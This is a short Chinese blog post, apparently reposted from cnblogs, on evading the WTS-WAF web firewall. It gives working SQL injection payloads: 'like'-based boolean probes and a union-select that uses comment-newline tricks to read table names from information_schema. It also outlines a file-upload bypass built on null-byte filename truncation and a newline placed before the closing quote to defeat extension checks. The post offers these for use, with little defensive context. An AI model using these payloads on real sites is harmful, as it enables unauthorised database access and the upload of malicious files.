bypass WTS-WAF(sql注入+文件上传)

sql注入

注入点:?id=13

payload:

?id=13'+and+'1'='1--+  拦截

 

 

 ?id=13'+and+1+like+1--+  不拦截,正常回显

 ?id=13'+and+1+like+2--+  不拦截,回显异常  判断存在注入

?id=-13' union select--%0a1,2,3,4,5,(select--%0atable_name from information_schema.tables where table_schema="数据库名" limit 2,1)--  继续注入

文件上传

 

 上面是上传后的文件名,使用00截断,下面是WTS-WAF检测的文件名,可以通过在后面的双引号前面换行来绕过后缀名检测

 

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/rnss/p/13527864.html